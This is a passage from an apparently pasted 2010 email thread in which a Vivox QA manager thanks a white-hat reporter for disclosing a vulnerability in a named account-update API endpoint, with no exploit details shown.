  590. eu92G69iGtWX3bS4j7Hl8TPMZn6I0dIelejZKsBE9IpI7v6u9BBjQWmhPaIFu3i3
  591. 6bCJs3i5x35j76Tr3LuuufqaNSlM2LbHuFW6kvFDVt2Hkn8kzKAcmXsRS+kTP80=
  592. =JZmz
  593. -----END PGP SIGNATURE-----
  594. Reply
  595. Forward
  596. Reply
  597. from Jenny Jones <[email protected]>
  598. to Zidonuke <[email protected]>
  599. date Tue, Jul 6, 2010 at 11:06 AM
  600. subject Re: SECURITY EXPLOIT -> bhr.vivox.com/api2/viv_acct.php?mode=update
  601. mailed-by vivox.com
  602. hide details Jul 6
  603. Thank you!
  604.  
  605. Excellent find by you. *Deeply* appreciate the use of the white hat for this hack, Z.
  606. One of our engineering staff should be contacting you.
  607.  
  608. Again, thank you!
  609. -----------
  610. Jenny Jones
  611. Software QA Manager
  612. Vivox, Inc.
  613. 508-650-3571 x2424
  614. ------------------------------------------------------------------
  615. The contents of this e-mail message and any attachments are Vivox proprietary, confidential, intended solely for the addressee and shared under terms of non disclosure as may exist between Vivox and recipient(s). The information may also be Vivox legally privileged. This transmission is sent for the sole purpose of delivery to the intended recipient. If you have received this transmission in error, any use, reproduction or dissemination of this transmission is strictly prohibited. If you are not the intended recipient, please immediately notify the sender by reply e-mail or phone and delete this message and its attachments, if any.
  616. ------------------------------------------------------------------
  617.  
  618.  
  619.  
  620. ----- Original Message -----
  621. From: "Zidonuke" <[email protected]>
  622. - Show quoted text -
  623. Reply
  624. Forward
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement